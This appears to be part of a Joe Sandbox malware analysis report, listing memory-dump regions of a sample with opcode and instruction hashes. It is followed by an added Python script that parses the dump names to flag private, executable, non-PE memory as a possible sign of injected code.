• Source File: 00000000.00000002.2635879106.00007FFD34880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34880000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ffd34880000_apDMcnqqWs.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: a5c02ecd466c3e52ef84cdfe8b5f1de5782c28aa6cdd3feebaf538014fc35331
• Instruction ID: c102a1c352d2726e46960b0041600fab590101a5cb29d557a3ce455470870585
• Opcode Fuzzy Hash: a5c02ecd466c3e52ef84cdfe8b5f1de5782c28aa6cdd3feebaf538014fc35331
• Instruction Fuzzy Hash:

Memory Dump Source
• Source File: 00000000.00000002.2635879106.00007FFD34880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34880000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ffd34880000_apDMcnqqWs.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 8b1272364641b12cc25e3da86b3682a2f6fff8aabbd2f1e793ae9bd4953d4e0d
• Instruction ID: f33a9bb65c683aa940dc190372d3789d794edec952e49d0e5b96487dc8771dba
• Opcode Fuzzy Hash: 8b1272364641b12cc25e3da86b3682a2f6fff8aabbd2f1e793ae9bd4953d4e0d
• Instruction Fuzzy Hash:

Strings
Memory Dump Source
• Source File: 00000000.00000002.2642096203.00007FFD34A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A40000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ffd34a40000_apDMcnqqWs.jbxd
Similarity
• API ID:
• String ID: (4_I$)4_I
• API String ID: 0-3679926267
• Opcode ID: a51ccfb76f0d8652ee02b6cb543355be8448b75f1ca0062c45c127e1973b50ac
                                                                                                                              • Instruction ID: 63383dbf4cf36ff532db2f2da1df072820035a7e04cf686ba830e87062a9c873
                                                                                                                              • Opcode Fuzzy Hash: a51ccfb76f0d8652ee02b6cb543355be8448b75f1ca0062c45c127e1973b50ac
                                                                                                                              • Instruction Fuzzy Hash: EA91F893A0F6C21BE756477D28691696F90BF4371836800FBE5C88B3DBB91CE905A381
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.2642096203.00007FFD34A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A40000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_7ffd34a40000_apDMcnqqWs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: '4_I$(4_I
                                                                                                                              • API String ID: 0-3159531343
                                                                                                                              • Opcode ID: 59bb1f90e0a5cfd7109c4e9b59b3da972097cf4ea6a4ee525fd3d35ae2441020
                                                                                                                              • Instruction ID: f29a0fad0ae4d4a400554b021b6737f18d69fdd14fb657ee24041f2bdfacea4c
                                                                                                                              • Opcode Fuzzy Hash: 59bb1f90e0a5cfd7109c4e9b59b3da972097cf4ea6a4ee525fd3d35ae2441020
                                                                                                                              • Instruction Fuzzy Hash: 41818B92E0F6C21BE756463D28AD1A95F80BF537183AC04FBD5D49B3DBB91CEC069281
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.2642096203.00007FFD34A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A40000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_7ffd34a40000_apDMcnqqWs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: "+w
                                                                                                                              • API String ID: 0-1638170601
                                                                                                                              • Opcode ID: b44d90e2819435175257db296cce4497161438015570e0ff4ac44d48e8b54185
                                                                                                                              • Instruction ID: f8b140eae8f18195a09e8377d19ce084836a5894f504b301b376984f5b9c956e
                                                                                                                              • Opcode Fuzzy Hash: b44d90e2819435175257db296cce4497161438015570e0ff4ac44d48e8b54185
                                                                                                                              • Instruction Fuzzy Hash: 0841F827F086626AE210B6FDF1E10EA7760EF853347291537C2CC9B443AA68748A9794
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.2642096203.00007FFD34A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A40000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_7ffd34a40000_apDMcnqqWs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 6e1956d34250a747c05c480e82b3959aad768b7bb269558c4b6eceef0dffbe2d
                                                                                                                              • Instruction ID: 171f855cf2df9bbeed5ebd8ac9d68ee05bd3665e5ba02ea68bbae091d9f1823d
                                                                                                                              • Opcode Fuzzy Hash: 6e1956d34250a747c05c480e82b3959aad768b7bb269558c4b6eceef0dffbe2d
                                                                                                                              • Instruction Fuzzy Hash: A691AF31A08A4E8FDF95DF58C4A4AE97BF1FF69304F2441AAD449D7296CB34E845CB80
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.2642096203.00007FFD34A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A40000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_7ffd34a40000_apDMcnqqWs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 83bb7d60a5cdb97ef8c90ba658725f093cfa119e09fa9a06a5c9b559a89a20ca
                                                                                                                              • Instruction ID: c5e6729eb119ddad3b387ca7db5dcd871f530f4954a6a60e8e07d4a4b1d43d50
                                                                                                                              • Opcode Fuzzy Hash: 83bb7d60a5cdb97ef8c90ba658725f093cfa119e09fa9a06a5c9b559a89a20ca
                                                                                                                              • Instruction Fuzzy Hash: CF71DA9390F7C25FE752466C28B90A96F90EF5375872840BFD1888B3D7E85C6806A355
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.2642096203.00007FFD34A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A40000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_7ffd34a40000_apDMcnqqWs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 0975e42e33ff88b6212303123a8e1bd9c3f3abf8b805eb4fe3b5eef6c40f3b6b
                                                                                                                              • Instruction ID: 0ab93ab62a8ba11ef82e7236fe05a60fe3cd0a40ce3af51fa49bdcb8d2f619e9
                                                                                                                              • Opcode Fuzzy Hash: 0975e42e33ff88b6212303123a8e1bd9c3f3abf8b805eb4fe3b5eef6c40f3b6b
                                                                                                                              • Instruction Fuzzy Hash: E5619122A0D793AFE71297B8D9F10D53BA0EF5336932911F3C6C4CA053DA2C6446E761
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.2642096203.00007FFD34A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A40000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_7ffd34a40000_apDMcnqqWs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: abbb91aa0978b84eceb49145084984e64e0021fdb2cadb2cdc48492b829eb643
                                                                                                                              • Instruction ID: f37008f5321768358eb5da1e87dea08460e790ad538272bd5ce365420cc1a4b1
                                                                                                                              • Opcode Fuzzy Hash: abbb91aa0978b84eceb49145084984e64e0021fdb2cadb2cdc48492b829eb643
                                                                                                                              • Instruction Fuzzy Hash: ED51E693A0F7C25BE7519A7C28BA0E97FD0EF1335471850BBD1888B3A7E81D6806A355
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.2642096203.00007FFD34A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A40000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_7ffd34a40000_apDMcnqqWs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 8af316845d4ce02383dd4e683180c83d55c752f17d5d2cf089b809d6e2731d78
                                                                                                                              • Instruction ID: 551e78c12f0ab3024d89e3570b5e6c93a229935cd3a109a3521cdefe193ac2ba
                                                                                                                              • Opcode Fuzzy Hash: 8af316845d4ce02383dd4e683180c83d55c752f17d5d2cf089b809d6e2731d78
                                                                                                                              • Instruction Fuzzy Hash: C331EB0374F6C22BEB52B67C85B60E6BFA0AF1321C72C15F7C4C8CA157E919A845D781
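Every function above was recovered from a memory dump rather than from the sample's PE image ("based on PE: false"), and the dump names end in ...00000040.00000800.00020000.00000000.sdmp. The check a reviewer wants here is whether those regions are private, executable memory with no file backing, which is what unpacked or injected code looks like. The script below is an added example, not part of the Joe Sandbox report or of any Joe Sandbox tooling. Joe Sandbox does not document the dotted file-name fields on this page, so the field meanings are an assumption inferred from the visible values: the 4th field equals the "Offset:" printed beside it in every record, the 5th field (0x40) equals the Windows PAGE_EXECUTE_READWRITE constant and the 7th field (0x20000) equals MEM_PRIVATE. The parser cross-checks the 4th field against the printed Offset and leaves the other fields undecoded. Two records are copied from the listing above; the third "based on PE: true" record is constructed to show a region the check does not flag.

```python
"""Added example: classify the 'Memory Dump Source' records of a Joe Sandbox report.

Not part of the report or of Joe Sandbox. Field layout of the .sdmp name is an
ASSUMPTION inferred from the visible records (see comments); only fields 4, 5 and 7
are interpreted.
"""
import re
from dataclasses import dataclass
from typing import Dict, List

# Windows memory protection constants (winnt.h); the low byte of field 5 is decoded with these.
PAGE_PROTECT: Dict[int, str] = {
    0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY",
}
EXECUTABLE_PROTECT = {0x10, 0x20, 0x40, 0x80}

# Windows region types (MEMORY_BASIC_INFORMATION.Type); field 7 is decoded with these.
MEM_PRIVATE = 0x20000
MEM_TYPE: Dict[int, str] = {MEM_PRIVATE: "MEM_PRIVATE", 0x40000: "MEM_MAPPED", 0x1000000: "MEM_IMAGE"}

RECORD_RE = re.compile(
    r"Source File:\s*(?P<name>\S+?\.sdmp),\s*Offset:\s*(?P<offset>[0-9A-Fa-f]+),"
    r"\s*based on PE:\s*(?P<pe>true|false)",
    re.IGNORECASE,
)


@dataclass(frozen=True)
class DumpRegion:
    name: str
    base: int          # field 4, cross-checked against the printed "Offset:"
    protect: int       # field 5, assumed to be a PAGE_* protection value
    mem_type: int      # field 7, assumed to be a MEM_* region type
    based_on_pe: bool  # the report's own flag

    def protect_name(self) -> str:
        return PAGE_PROTECT.get(self.protect & 0xFF, f"0x{self.protect:X}")

    def type_name(self) -> str:
        return MEM_TYPE.get(self.mem_type, f"0x{self.mem_type:X}")

    def is_unbacked_executable(self) -> bool:
        """Executable + private (not file-mapped) + not reconstructed from a PE header.

        That combination points at unpacked or injected code rather than a loaded module.
        """
        return ((self.protect & 0xFF) in EXECUTABLE_PROTECT
                and self.mem_type == MEM_PRIVATE
                and not self.based_on_pe)


def parse_record(line: str) -> DumpRegion:
    """Parse one 'Source File: ..., Offset: ..., based on PE: ...' line."""
    m = RECORD_RE.search(line)
    if not m:
        raise ValueError(f"not a Memory Dump Source record: {line!r}")
    name = m.group("name")
    fields = name[: -len(".sdmp")].split(".")
    if len(fields) != 8:
        raise ValueError(f"expected 8 dotted fields in {name!r}, got {len(fields)}")
    base, offset = int(fields[3], 16), int(m.group("offset"), 16)
    if base != offset:
        # Guards the assumption that field 4 is the region base address.
        raise ValueError(f"base field {base:#x} disagrees with Offset {offset:#x}")
    return DumpRegion(name=name, base=base, protect=int(fields[4], 16),
                      mem_type=int(fields[6], 16), based_on_pe=m.group("pe").lower() == "true")


def suspicious_regions(lines: List[str]) -> List[DumpRegion]:
    """Distinct regions (by base) that look like unbacked executable memory, lowest base first."""
    seen: Dict[int, DumpRegion] = {}
    for line in lines:
        if "Source File:" in line:
            region = parse_record(line)
            if region.is_unbacked_executable():
                seen[region.base] = region
    return [seen[b] for b in sorted(seen)]


SAMPLE_RECORDS = [
    # Two records copied from this report's function listing.
    "• Source File: 00000000.00000002.2635879106.00007FFD34880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34880000, based on PE: false",
    "• Source File: 00000000.00000002.2642096203.00007FFD34A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A40000, based on PE: false",
    # Constructed, not from the report: an image-backed RX region that the check should ignore.
    "• Source File: 00000000.00000002.0000000000.00007FF700000000.00000020.00000800.01000000.00000000.sdmp, Offset: 00007FF700000000, based on PE: true",
]

if __name__ == "__main__":
    for r in suspicious_regions(SAMPLE_RECORDS):
        print(f"{r.base:#018x} {r.protect_name():<24} {r.type_name():<12} based_on_pe={r.based_on_pe}")
```

Run against the records in this listing, both dump regions (0x7FFD34880000 and 0x7FFD34A40000) come out as PAGE_EXECUTE_READWRITE, MEM_PRIVATE and not PE-based, which is consistent with the report's "Creates a process in suspended mode (likely to inject code)" and "Allocates memory with a write watch" signatures. The base-versus-Offset cross-check exists so that a report whose file-name layout differs fails loudly instead of silently decoding the wrong field.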